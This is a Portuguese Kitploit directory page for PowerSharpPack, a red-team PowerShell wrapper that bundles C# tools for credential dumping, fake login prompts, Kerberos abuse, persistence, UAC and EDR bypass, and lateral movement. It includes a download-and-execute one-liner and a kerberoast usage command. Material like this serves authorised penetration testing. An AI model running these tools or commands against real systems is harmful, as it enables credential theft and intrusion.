Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PowerSharpPack — Wrapper do PowerShell que agrupa mais de 50 ferramentas ofensivas de segurança em C# para pós-exploração, escalonamento de privilégios, extração de credenciais, movimento lateral e reconhecimento do Active Directory em engajamentos de red team. | Kitploit
Ferramentas/GitHubGitHub/s3cur3th1ssh1t/powersharppack
Escalada de PrivilégiosFrameworks de ExploraçãoGeração de PayloadsMovimento LateralColeta de InformaçõesPós-ExploraçãoTestes de PenetraçãoRed Teaming

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
s3cur3th1ssh1t/powersharppack

PowerSharpPack

Wrapper do PowerShell que agrupa mais de 50 ferramentas ofensivas de segurança em C# para pós-exploração, escalonamento de privilégios, extração de credenciais, movimento lateral e reconhecimento do Active Directory em engajamentos de red team.

Ver Repositório
1.7k31215há 1 anoRevisado pelo Kitploit

Patrocinado por

     

PowerSharpPack

Muitos projetos ofensivos úteis em CSharp empacotados em PowerShell para fácil uso.

Por quê? Na minha opinião pessoal, o PowerShell ofensivo não está morto por causa de AMSI, Script-block-logging, Modo de Linguagem Restrita ou outros recursos de proteção. Qualquer um desses mecanismos pode ser contornado. Como a maioria dos novos projetos inovadores de segurança ofensiva são escritos em C#, decidi torná-los utilizáveis também no PowerShell.

Então, o que eu basicamente fiz aqui?

  1. Primeiramente, clonar cada repositório C#.
  2. Definir a classe e os métodos principais como públicos.
  3. Para alguns projetos, mesclei pull requests com novos recursos ou correções de bugs ou tive que remover declarações environment.exit para que todo o processo do PowerShell não seja morto por parâmetros ausentes e assim por diante.
  4. Depois, compilar cada binário.
  5. Compactar com Gzip e codificar em base64 o binário compilado e carregá-lo no PowerShell via [System.Reflection.Assembly]::Load($DecompressedDecodedBinary).

É um processo muito fácil, mas demorado para muitos repositórios.

Quais ferramentas estão incluídas?

Internalmonologue

Ataque de Monólogo Interno: Recuperando Hashes NTLM sem Tocar no LSASS

@Crédito para: https://github.com/eladshamir/Internal-Monologue

Seatbelt

Seatbelt é um projeto C# que realiza uma série de "verificações de segurança" orientadas a host, relevantes tanto para perspectivas ofensivas quanto defensivas.

@Crédito para: https://github.com/GhostPack/Seatbelt

SharpWeb

Projeto .NET 2.0 CLR para recuperar credenciais salvas do navegador do Google Chrome, Mozilla Firefox e Microsoft Internet Explorer/Edge.

@Crédito para: https://github.com/djhohnstein/SharpWeb

UrbanBishop

Cria uma seção RW local no UrbanBishop e então mapeia essa seção como RX em um processo remoto. Carregamento de shellcode facilitado.

@Crédito para: https://github.com/FuzzySecurity/Sharp-Suite

SharpUp

SharpUp é uma porta em C# de várias funcionalidades do PowerUp.

@Crédito para: https://github.com/GhostPack/SharpUp

Rubeus

Rubeus é um conjunto de ferramentas C# para interação e abuso de Kerberos puro.

@Crédito para: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/

SharPersist

Kit de persistência do Windows escrito em C#.

@Crédito para: https://github.com/fireeye/SharPersist

Sharpview

Implementação em C# do PowerView do harmj0y

@Crédito para: https://github.com/tevora-threat/SharpView

winPEAS

Verifique a lista de escalonamento de privilégio local do Windows do book.hacktricks.xyz

@Crédito para: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Lockless

Lockless permite copiar arquivos bloqueados.

@Crédito para: https://github.com/GhostPack/Lockless

SharpChromium

Projeto .NET 4.0 CLR para recuperar dados do Chromium, como cookies, histórico e logins salvos.

@Crédito para: https://github.com/djhohnstein/SharpChromium

SharpDPAPI

SharpDPAPI é uma porta em C# de algumas funcionalidades do Mimikatz DPAPI.

@Crédito para: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/

SharpShares

Enumera todos os compartilhamentos de rede no domínio atual. Também pode resolver nomes para endereços IP.

@Crédito para: https://github.com/djhohnstein/SharpShares

SharpSniper

Encontra usuários específicos no Active Directory através de seu nome de usuário e endereço IP de logon.

@Crédito para: https://github.com/HunnicCyber/SharpSniper

SharpSpray

SharpSpray é um conjunto simples de código para realizar um ataque de spray de senha contra todos os usuários de um domínio usando LDAP e é compatível com Cobalt Strike.

@Crédito para: https://github.com/jnqpblc/SharpSpray

Watson

Enumera KBs ausentes e sugere explorações para vulnerabilidades úteis de escalonamento de privilégio.

@Crédito para: https://github.com/rasta-mouse/Watson

Grouper2

Encontra vulnerabilidades na Política de Grupo do AD.

@Crédito para: https://github.com/l0ss/Grouper2

Tokenvator

Uma ferramenta para elevar privilégios com Tokens do Windows.

@Crédito para: https://github.com/0xbadjuju/Tokenvator

SauronEye

Ferramenta de busca para encontrar arquivos específicos contendo palavras específicas, ex: arquivos contendo senhas.

@Crédito para: https://github.com/vivami/SauronEye

Basta carregar o script principal com

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')

e escolha a ferramenta como parâmetro switch, por exemplo:

PowerSharpPack -seatbelt -Command "AMSIProviders"

texto alternativo

Se você quiser passar vários parâmetros para o binário, basta usar aspas como:

PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"

Se você não quiser carregar todos os binários por razões, pode usar os scripts PowerShell por binário localizados na pasta PowerSharpBinaries.

Projetos que também estão disponíveis como script PowerShell autônomo:

SharpCloud

Simples C# para verificar a existência de arquivos de credenciais relacionados a AWS, Microsoft Azure e Google Compute.

@Crédito para: https://github.com/chrismaddalena/SharpCloud

SharpSSDP

Descoberta de Serviço SSDP

@Crédito para: https://github.com/rvrsh3ll/SharpSSDP

DAFT

DAFT: Database Audit Framework & Toolkit

@Crédito para: https://github.com/NetSPI/DAFT

Get-RBCD-Threaded

Ferramenta para descobrir caminhos de ataque de Delegação Restrita Baseada em Recursos em ambientes Active Directory.

@Crédito para: https://github.com/FatRodzianko/Get-RBCD-Threaded

SharpGPO-RemoteAccessPolicies

Uma ferramenta C# para enumerar políticas de acesso remoto através da política de grupo.

@Crédito para: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies

SharpAllowedToAct

Tomada de controle de objeto de computador através de Delegação Restrita Baseada em Recursos (msDS-AllowedToActOnBehalfOfOtherIdentity).

@Crédito para: https://github.com/pkb1s/SharpAllowedToAct

WireTap

Projeto .NET 4.0 para interagir com hardware de vídeo, áudio e teclado.

@Crédito para: https://github.com/djhohnstein/WireTap

SharpClipboard

Monitor de Área de Transferência em C#

@Crédito para: https://github.com/slyd0g/SharpClipboard

SharpPrinter

Descobrir Impressoras + verificar vulnerabilidades.

@Crédito para: https://github.com/rvrsh3ll/SharpPrinter

SharpHide

Ferramenta para criar chaves de registro ocultas.

@Crédito para: https://github.com/outflanknl/SharpHide

SpoolSample

Ferramenta PoC para coagir hosts Windows a autenticar em outras máquinas através da interface RPC MS-RPRN. Isso também é possível através de outros protocolos.

@Crédito para: https://github.com/leechristensen/SpoolSample

SharpGPOAbuse

SharpGPOAbuse é um aplicativo .NET escrito em C# que pode ser usado para tirar proveito dos direitos de edição de um usuário em um Objeto de Política de Grupo (GPO) para comprometer os objetos controlados por esse GPO.

@Crédito para: https://github.com/FSecureLABS/SharpGPOAbuse

SharpDump

SharpDump é uma porta em C# da funcionalidade Out-Minidump.ps1 do PowerSploit.

@Crédito para: https://github.com/GhostPack/SharpDump

SharpHound3

Coletor de Dados C# para o Projeto BloodHound, Versão 3

@Crédito para: https://github.com/BloodHoundAD/SharpHound3

PostDump

Outra ferramenta para realizar minidump do processo LSASS usando algumas técnicas para evitar detecção.

@Crédito para: https://github.com/YOLOP0wn/POSTDump

SharpLocker

SharpLocker ajuda a obter credenciais do usuário atual exibindo uma tela de bloqueio falsa do Windows; toda saída é enviada para o Console, o que funciona perfeitamente para o Cobalt Strike.

@Crédito para: https://github.com/Pickfordmatt/SharpLocker

Eyewitness

EyeWitness foi projetado para tirar screenshots de sites, fornecer algumas informações de cabeçalho do servidor e identificar credenciais padrão, se possível.

@Crédito para: https://github.com/FortyNorthSecurity/EyeWitness

FakeLogonScreen

Tela de logon falsa do Windows para roubar senhas.

@Crédito para: https://github.com/bitsadmin/fakelogonscreen

P0wnedShell

PowerShell Runspace Post Exploitation Toolkit

@Crédito para: https://github.com/Cn33liz/p0wnedShell

Safetykatz

SafetyKatz é uma combinação de uma versão ligeiramente modificada do projeto Mimikatz do @gentilkiwi e do .NET PE Loader do @subTee. Modifiquei esta novamente com minha própria versão ofuscada do Mimikatz.

@Crédito para: https://github.com/GhostPack/SafetyKatz

InveighZero

Ferramenta de spoofing/man-in-the-middle em C# para Windows para LLMNR/mDNS/NBNS/DNS/DHCPv6 .

@Crédito para: https://github.com/Kevin-Robertson/InveighZero

SharpSploit

SharpSploit é uma biblioteca .NET de pós-exploração escrita em C#.

@Crédito para: https://github.com/cobbr/SharpSploit

Snaffler

Uma ferramenta para pentesters ajudar a encontrar doces deliciosos, por @l0ss e @Sh3r4 ( Twitter: @/mikeloss e @/sh3r4_hax ).

@Crédito para: https://github.com/SnaffCon/Snaffler

BadPotato

Printspoofer do itm4n em C#.

@Crédito para: https://github.com/BeichenDream/BadPotato

BetterSafetyKatz

Fork do SafetyKatz que busca dinamicamente a versão pré-compilada mais recente do Mimikatz diretamente do repositório GitHub do gentilkiwi, corrige assinaturas em tempo de execução e usa SharpSploit DInvoke para carregar PE na memória.

@Crédito para: https://github.com/Flangvik/BetterSafetyKatz

SharpKatz

Porta em C# dos comandos sekurlsa::logonpasswords, sekurlsa::ekeys e lsadump::dcsync do mimikatz.

@Crédito para: https://github.com/b4rtik/SharpKatz

Gopher

Ferramenta C# para descobrir frutos baixos.

@Crédito para: https://github.com/EncodeGroup/Gopher

SharpOxidResolver

IOXIDResolver do AirBus Security/PingCastle.

@Crédito para: https://github.com/vletoux/pingcastle/

SharpBlock

Um método para contornar as DLLs de projeção ativa do EDR impedindo a execução do ponto de entrada.

@Crédito para: https://github.com/CCob/SharpBlock

SharpLoginPrompt

Este programa cria um prompt de login para coletar nome de usuário e senha do usuário atual. Este projeto permite que a equipe vermelha phishing nome de usuário e senha do usuário atual sem tocar no lsass e sem ter credenciais de administrador no sistema.

@Crédito para: https://github.com/shantanu561993/SharpLoginPrompt

ThunderFox

Recupera dados (contatos, emails, histórico, cookies e credenciais) do Thunderbird e Firefox.

@Crédito para: https://github.com/V1V1/SharpScribbles

StickyNotesExtract

Extrai dados do banco de dados do Sticky Notes do Windows. Funciona no Windows 10 Build 1607 e superior. Este projeto não depende de dependências externas.

@Crédito para: https://github.com/V1V1/SharpScribbles

SCShell

Ferramenta de movimento lateral sem arquivo que depende do ChangeServiceConfigA para executar comandos.

@Crédito para: https://github.com/Mr-Un1k0d3r/SCShell

SharpSecDump

Porta .Net da funcionalidade de dump remoto de SAM + LSA Secrets do secretsdump.py do impacket.

@Crédito para: https://github.com/G0ldenGunSec/SharpSecDump

SharpHandler

Este projeto reutiliza handles abertos para lsass para analisar ou fazer minidump do lsass, portanto você não precisa usar seu próprio handle lsass para interagir com ele.

@Crédito para: https://github.com/jfmaes/SharpHandler

SharpRDP

Aplicativo de Console .NET do Protocolo de Área de Trabalho Remota para Execução de Comandos Autenticada.

@Crédito para: https://github.com/0xthirteen/SharpRDP

SharpMove

Projeto .NET para realizar Execução Remota Autenticada.

@Crédito para: https://github.com/0xthirteen/SharpMove

SharpStay

Projeto .NET para instalar Persistência

@Crédito para: https://github.com/0xthirteen/SharpStay

SharpPrintNightmare

Implementação C# do PrintNightmare CVE-2021-1675/CVE-2021-34527

@Crédito para: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare

Certify

Abuso de certificados do Active Directory.

@Crédito para: https://github.com/GhostPack/Certify

Farmer

Farmer é um projeto para coletar hashes NetNTLM em um domínio Windows. Farmer consegue isso criando um servidor WebDAV local que faz com que o Mini Redirector WebDAV autentique de qualquer cliente conectado.

@Crédito para: https://github.com/mdsecactivebreach/Farmer

SharpBypassUAC

Ferramenta C# para bypass de UAC

@Crédito para: https://github.com/FatRodzianko/SharpBypassUAC

StandIn

StandIn é um pequeno toolkit de pós-exploração AD .NET35/45

@Crédito para: https://github.com/FuzzySecurity/StandIn

Carbuncle

Ferramenta para interagir com interop do Outlook durante engajamentos de equipe vermelha

@Crédito para: https://github.com/checkymander/Carbuncle

Whisker

Whisker é uma ferramenta C# para assumir contas de usuário e computador do Active Directory manipulando seu atributo msDS-KeyCredentialLink, efetivamente adicionando "Shadow Credentials" à conta alvo.

@Crédito para: https://github.com/eladshamir/Whisker

SharpLdapRelayScan

Porta C# do LdapRelayScan

@Crédito para: https://github.com/klezVirus/SharpLdapRelayScan

LdapSignCheck

Projeto C# para verificar assinatura LDAP.

@Crédito para: https://github.com/cube0x0/LdapSignCheck

SharpImpersonation

SharpImpersonation - Uma ferramenta de Impersonação de Usuário - via Token ou injeção de Shellcode.

@Crédito para: https://github.com/S3cur3Th1sSh1t/SharpImpersonation

SharpWSUS

SharpWSUS é uma ferramenta CSharp para movimento lateral através do WSUS. Há um blog correspondente (https://labs.nettitude.com/blog/introducing-sharpwsus/) com informações mais detalhadas sobre a ferramenta, caso de uso e detecção.

@Crédito para: https://github.com/nettitude/SharpWSUS

MalSCCM

Esta ferramenta permite abusar de servidores SCCM locais ou remotos para implantar aplicativos maliciosos nos hosts que eles gerenciam. Para usar esta ferramenta, seu processo atual deve ter direitos de administrador sobre o servidor SCCM. Tipicamente, as implantações do SCCM terão o servidor de gerenciamento e o servidor primário no mesmo host; nesse caso, o host retornado pelo comando locate pode ser usado como servidor primário.

@Crédito para: https://github.com/nettitude/MalSCCM

KrbRelay

Framework para retransmissão Kerberos

@Crédito para: https://github.com/cube0x0/KrbRelay

SharpSCCM

Um utilitário C# para interagir com SCCM

@Crédito: https://github.com/Mayyhem/SharpSCCM

ShadowSpray

Uma ferramenta para pulverizar Shadow Credentials por todo um domínio na esperança de abusar de DACLs GenericWrite/GenericAll há muito esquecidas sobre outros objetos no domínio.

@Crédito: https://github.com/Dec0ne/ShadowSpray

Grouper3

Encontre vulnerabilidades na Política de Grupo do AD, mas faça melhor do que o Grouper2 fez.

@Crédito para: https://github.com/Group3r/Group3r

Os dois últimos são basicamente não Assemblies. Mas construí um Assembly para executá-los a partir da memória, que é carregável através da técnica deste repositório. Outra técnica em segundo plano para execução, mas ainda útil:

HandleKatz

Dumper PIC de lsass usando handles clonados

@Crédito para: https://github.com/codewhitesec/HandleKatz

NanoDump

Despeje o LSASS como manda o figurino

@Crédito para: https://github.com/helpsystems/nanodump

PPLDump

Despeje a memória de um PPL com um exploit em userland

@Crédito para: https://github.com/itm4n/PPLdump

Baixar ferramenta